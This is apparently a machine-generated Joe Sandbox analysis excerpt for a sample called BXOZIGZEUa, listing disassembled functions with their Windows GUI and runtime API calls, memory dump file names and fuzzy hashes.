                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$ClientInflateMetricsSystem$H_prolog3H_prolog3_
                                                              • String ID:
                                                              • API String ID: 1524981428-0
                                                              • Opcode ID: d7e573fa2f9701fcf97e0cfb8ee3fb371fe7b9048af26d22bc0bc73777e2a5ba
                                                              • Instruction ID: 3202a14860766cdd9b77f218b08ce72228e58be2073854e654c484b5d49f48bf
                                                              • Opcode Fuzzy Hash: d7e573fa2f9701fcf97e0cfb8ee3fb371fe7b9048af26d22bc0bc73777e2a5ba
                                                              • Instruction Fuzzy Hash: 52715871900219DFCF14DFA8C885AEDBBB1FF48310F25422EE915BB285DB74AA45CB50
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 004F4222
                                                                • Part of subcall function 00524CC5: __EH_prolog3.LIBCMT ref: 00524CCC
                                                              • GetMenuItemCount.USER32(?), ref: 004F428C
                                                              • GetMenuItemID.USER32(?,?), ref: 004F42AF
                                                              • GetMenuItemCount.USER32(?), ref: 004F42F2
                                                              • GetMenuItemID.USER32(?,?), ref: 004F4326
                                                              • SendMessageW.USER32(?,00000234,00000000,00000000), ref: 004F4398
                                                              • GetMenuState.USER32(?,?,00000400), ref: 004F43F0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$Count$H_prolog3H_prolog3_MessageSendState
                                                              • String ID:
                                                              • API String ID: 999183886-0
                                                              • Opcode ID: 57e1a075c4ffee6f8cb0b197ecf57ae7a0ff23d4eb85da556b3e0c70e13de9bd
                                                              • Instruction ID: ba95adc2fbbb9f3115350d2b3840791acd1c2a2af03915281be0538fd6b061f3
                                                              • Opcode Fuzzy Hash: 57e1a075c4ffee6f8cb0b197ecf57ae7a0ff23d4eb85da556b3e0c70e13de9bd
                                                              • Instruction Fuzzy Hash: 65713B3180016A9BCF249F64CC85BFEB7B5BB85314F1442EAEA29A3291CB355E81DF54
                                                              APIs
                                                                • Part of subcall function 00525F25: __EH_prolog3_GS.LIBCMT ref: 00525F2C
                                                                • Part of subcall function 00525F25: GetDesktopWindow.USER32 ref: 00525F3A
                                                                • Part of subcall function 00525F25: SetRectEmpty.USER32(?), ref: 00525F71
                                                                • Part of subcall function 00525F25: SetRectEmpty.USER32(?), ref: 00525F83
                                                                • Part of subcall function 00525F25: CopyRect.USER32(?,?), ref: 00525F8E
                                                                • Part of subcall function 00525F25: CopyRect.USER32(?,?), ref: 00525FAA
                                                              • SetRectEmpty.USER32(?), ref: 00528185
                                                              • ClientToScreen.USER32(?,?), ref: 005281AD
                                                              • IsRectEmpty.USER32(?), ref: 005281D6
                                                              • GetParent.USER32(?), ref: 005281E3
                                                              • GetCursorPos.USER32(?), ref: 00528208
                                                              • IsRectEmpty.USER32(?), ref: 005282BE
                                                              • EqualRect.USER32(?,?), ref: 005282D0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Empty$Copy$ClientCursorDesktopEqualH_prolog3_ParentScreenWindow
                                                              • String ID:
                                                              • API String ID: 1345960709-0
                                                              • Opcode ID: e01f631bbcc38ed4b7dafa0044e24ddd888a1358fcb4ce1308f848cab7a4049e
                                                              • Instruction ID: a8354666230001512840838b324feac933aff87bea8f3b6cdee17dfd9e04c460
                                                              • Opcode Fuzzy Hash: e01f631bbcc38ed4b7dafa0044e24ddd888a1358fcb4ce1308f848cab7a4049e
                                                              • Instruction Fuzzy Hash: 6E513C71A01529AFCF05DFA4D8889EEBBBAFF49710B14452AF811F7290DB719944CBA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CaptureCursorReleaseState
                                                              • String ID: Dc$c$c
                                                              • API String ID: 3832350104-3725593719
                                                              • Opcode ID: 2fb609ce449393755db4e1b2d204a4e613bdcad75b88123a022af0606d5689be
                                                              • Instruction ID: 7d2b4e1294a058cb97b57e9be29113353331e675826f9978e29bf77648006a41
                                                              • Opcode Fuzzy Hash: 2fb609ce449393755db4e1b2d204a4e613bdcad75b88123a022af0606d5689be
                                                              • Instruction Fuzzy Hash: 0451BE34600201EFDB259FB9C888BAEBFA5FF49700F18446EE556872D6EB71AD40CB51
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000407,00000000,?), ref: 0053CD82
                                                              • PostMessageW.USER32(?,0000001F,00000000,00000000), ref: 0053CDBC
                                                              • GetParent.USER32(?), ref: 0053CE4F
                                                              • GetParent.USER32(?), ref: 0053CE7F
                                                              • GetCapture.USER32 ref: 0053CE9A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageParent$CapturePostSend
                                                              • String ID: c
                                                              • API String ID: 3593767962-2927717585
                                                              • Opcode ID: 78d1ad0ce9d3f1f165fbf4bf501778a193e9b397529d82738ba275aeba4ec554
                                                              • Instruction ID: ee6c476d70e152f5a705f6a61c5f7e1880e814b132abbea9b393082bdc1c0b9a
                                                              • Opcode Fuzzy Hash: 78d1ad0ce9d3f1f165fbf4bf501778a193e9b397529d82738ba275aeba4ec554
                                                              • Instruction Fuzzy Hash: 5051AD32A003419BEF366A64CC88B797F99BB04701F19497AF549EB2D2CB75DC80E752
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 005B2F85
                                                                • Part of subcall function 005B2EF6: OleGetClipboard.OLE32(?), ref: 005B2F0E
                                                              • ReleaseStgMedium.OLE32(?), ref: 005B2FFA
                                                              • ReleaseStgMedium.OLE32(?), ref: 005B303F
                                                              • CoTaskMemFree.OLE32(?), ref: 005B30E7
                                                              • ReleaseStgMedium.OLE32(?), ref: 005B305F
                                                                • Part of subcall function 004D8E6A: _malloc.LIBCMT ref: 004D8E88
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MediumRelease$ClipboardFreeH_prolog3_catchTask_malloc
                                                              • String ID: '
                                                              • API String ID: 3930503942-1997036262
                                                              • Opcode ID: c4d90cf85c30fcd61f734debf58f9ea39eaf77bbcc3448b918511e8343c60dda
                                                              • Instruction ID: fda87d8cb06be1f3f785f1355f05f03b8c1dc9b4bcdd9d26b8f794d08b07e08f
                                                              • Opcode Fuzzy Hash: c4d90cf85c30fcd61f734debf58f9ea39eaf77bbcc3448b918511e8343c60dda
                                                              • Instruction Fuzzy Hash: 2A511971900209EECF10EFA5C999AFD7BB5BF48304F20446EF505EA281DA79AB44DB61
                                                              APIs
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 005224F4
                                                              • GetMonitorInfoW.USER32(00000000), ref: 005224FB
                                                              • CopyRect.USER32(?,?), ref: 0052250D
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0052251D
                                                              • IntersectRect.USER32(?,?,?), ref: 00522550
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: InfoMonitorRect$CopyFromIntersectParametersPointSystem
                                                              • String ID: (
                                                              • API String ID: 2931574886-3887548279
                                                              • Opcode ID: 93623997f0be0cf1ae6e972b3c72f2da67bef16a142bb8713e17972daa3cccf3
                                                              • Instruction ID: e0a796985b570dee23a544e71567fd8b74535caad18d066f49be0a332a9bc7e7
                                                              • Opcode Fuzzy Hash: 93623997f0be0cf1ae6e972b3c72f2da67bef16a142bb8713e17972daa3cccf3
                                                              • Instruction Fuzzy Hash: DF51E9B5E00219AFCB24DFA9D9889AEFBF9FF59300F10851AE415E7250D774AA04CF61
                                                              APIs
                                                                • Part of subcall function 00549B37: __EH_prolog3_catch.LIBCMT ref: 00549B3E
                                                              • UpdateWindow.USER32(?), ref: 004F8871
                                                              • EqualRect.USER32(?,?), ref: 004F88A7
                                                              • InflateRect.USER32(?,00000002,00000002), ref: 004F88BF
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004F88CE
                                                              • InflateRect.USER32(?,00000002,00000002), ref: 004F88E3
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004F88F5
                                                              • UpdateWindow.USER32(?), ref: 004F88FE
                                                                • Part of subcall function 004F83AB: InvalidateRect.USER32(?,?,00000001,?), ref: 004F8420
                                                                • Part of subcall function 004F83AB: InflateRect.USER32(?,?,?), ref: 004F8466
                                                                • Part of subcall function 004F83AB: RedrawWindow.USER32(?,?,00000000,00000401,?,?), ref: 004F8479
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$InflateInvalidateWindow$Update$EqualH_prolog3_catchRedraw
                                                              • String ID:
                                                              • API String ID: 1041772997-0
                                                              • Opcode ID: a6c6c9def279eca8dce0456d5a26b5a49e11b1b2c724b1f2921efb411f35bfc0
                                                              • Instruction ID: b05d9c67bbe1349a746007f979ee4fde30f4687eb2c282500b83b189302de495
                                                              • Opcode Fuzzy Hash: a6c6c9def279eca8dce0456d5a26b5a49e11b1b2c724b1f2921efb411f35bfc0
                                                              • Instruction Fuzzy Hash: 414148716002099FCF11DF64C888BBB7BA9FB48314F144279ED0AEE292DB759945CB61
                                                              APIs
                                                              • GetParent.USER32(?), ref: 004E8A44
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004E8A68
                                                              • UpdateWindow.USER32(?), ref: 004E8A83
                                                              • SendMessageW.USER32(?,00000121,00000000,?), ref: 004E8AA4
                                                              • SendMessageW.USER32(?,0000036A,00000000,00000002), ref: 004E8ABC
                                                              • UpdateWindow.USER32(?), ref: 004E8AFF
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004E8B30
                                                                • Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Message$Window$PeekSendUpdate$LongParent
                                                              • String ID:
                                                              • API String ID: 2853195852-0
                                                              • Opcode ID: 2696f7a0a9e327c493a95891765643f2ab33bc4581a787e57482186f71bc261e
                                                              • Instruction ID: 45283a61be1527cf2120b797ace0c49dfd946447b0a7270561b6453cc6625156
                                                              • Opcode Fuzzy Hash: 2696f7a0a9e327c493a95891765643f2ab33bc4581a787e57482186f71bc261e
                                                              • Instruction Fuzzy Hash: B8417170900685EBCF219F57CC48EAFBBB4FF90706F14416FE445A22A1DB799940DB58
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0059A64E
                                                                • Part of subcall function 0055C236: __EH_prolog3.LIBCMT ref: 0055C23D
                                                                • Part of subcall function 005B236A: SetRectEmpty.USER32(?), ref: 005B239A
                                                              • SetRectEmpty.USER32(?), ref: 0059A796
                                                              • SetRectEmpty.USER32(?), ref: 0059A7A5
                                                              • SetRectEmpty.USER32(?), ref: 0059A7AE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: EmptyRect$H_prolog3
                                                              • String ID: False$True
                                                              • API String ID: 3752103406-1895882422
                                                              • Opcode ID: 811c2738f18775302e4a0651406bc71a301da3e0ff9c6974c17bb6a7a4a5b041
                                                              • Instruction ID: de4e19f84396bc765e1ac2741ed397b989d87ac40a674322abf701ea1cede548
                                                              • Opcode Fuzzy Hash: 811c2738f18775302e4a0651406bc71a301da3e0ff9c6974c17bb6a7a4a5b041
                                                              • Instruction Fuzzy Hash: AD51B0B0801B458FD762DF7AC5957DAFBE8BFA4304F10494FE0AE862A1DBB42644CB15
                                                              APIs
                                                                • Part of subcall function 004F07A0: _malloc.LIBCMT ref: 004F07B3
                                                              • _free.LIBCMT ref: 004F085C
                                                              • _memset.LIBCMT ref: 004F0875
                                                              • _memset.LIBCMT ref: 004F08AF
                                                              • _memcpy_s.LIBCMT ref: 004F08C9
                                                              • CreateDIBSection.GDI32(00000000,00000000,00000000,00000008,00000000,00000000), ref: 004F08E2
                                                              • _free.LIBCMT ref: 004F08F4
                                                              • _free.LIBCMT ref: 004F0927
                                                                • Part of subcall function 005CE216: HeapFree.KERNEL32(00000000,00000000,?,005D5DB2,00000000,?,005D4298,?,00000001,?,?,005D6FC6,00000018,00638280,0000000C,005D7056), ref: 005CE22C
                                                                • Part of subcall function 005CE216: GetLastError.KERNEL32(00000000,?,005D5DB2,00000000,?,005D4298,?,00000001,?,?,005D6FC6,00000018,00638280,0000000C,005D7056,?), ref: 005CE23E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: _free$_memset$CreateErrorFreeHeapLastSection_malloc_memcpy_s
                                                              • String ID:
                                                              • API String ID: 2204576675-0
                                                              • Opcode ID: 5bba704747f580aed307c10b59a6f33da992abf9dda235af61e3d0ab892bff55
                                                              • Instruction ID: 166669ff0e17f531fbc60860b85ca3b784eb1aa8935e0a15821b49947a695adb
                                                              • Opcode Fuzzy Hash: 5bba704747f580aed307c10b59a6f33da992abf9dda235af61e3d0ab892bff55
                                                              • Instruction Fuzzy Hash: 7E31E8B6900219ABE720EF61CC05F7B77ACEF51364F10442AEA41E7242E778ED0087D4
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 00523093
                                                                • Part of subcall function 00530419: RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00530490
                                                              • IsWindowVisible.USER32(?), ref: 005230BD
                                                              • IsWindowVisible.USER32(?), ref: 00523101
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 00523123
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000501), ref: 00523135
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00523157
                                                              • RedrawWindow.USER32(?,?,00000000,00000541), ref: 00523188
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Redraw$Visible
                                                              • String ID:
                                                              • API String ID: 1637130220-0
                                                              • Opcode ID: 79fc6a3bae74230fd922a335521167e76ef65c09428c4f469ea7c1a628f48066
                                                              • Instruction ID: 85d366d4eada84dd961b3a932291b94e77773b04448638e1ea39b60730c5c479
                                                              • Opcode Fuzzy Hash: 79fc6a3bae74230fd922a335521167e76ef65c09428c4f469ea7c1a628f48066
                                                              • Instruction Fuzzy Hash: 5A416A71A0031AEFDB20AF65DD80ABABBBAFF45305F10047DE14A962A1D7349E51DF60
                                                              APIs
                                                              • _memset.LIBCMT ref: 004E913A
                                                              • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 004E9163
                                                              • GetWindowLongW.USER32(?,000000FC), ref: 004E9175
                                                              • GetWindowLongW.USER32(?,000000FC), ref: 004E9186
                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 004E91A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$MessageSend_memset
                                                              • String ID: ,
                                                              • API String ID: 2997958587-3772416878
                                                              • Opcode ID: 01a9d8859fb04fb6bb57442a5715571c3b7a175de6fae57f05e5839b23566a0b
                                                              • Instruction ID: 89f293a8d6da2b78cb2f3954595053074227b9658e0c4572e50451840579f413
                                                              • Opcode Fuzzy Hash: 01a9d8859fb04fb6bb57442a5715571c3b7a175de6fae57f05e5839b23566a0b
                                                              • Instruction Fuzzy Hash: 99419E706003459FDB20EF76C888A6EB7E5BF48315F14062EE48297792DB38ED04CB58
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D733D
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D7360
                                                              • std::bad_exception::bad_exception.LIBCMT ref: 004D73E4
                                                              • __CxxThrowException@8.LIBCMT ref: 004D73F2
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D7405
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
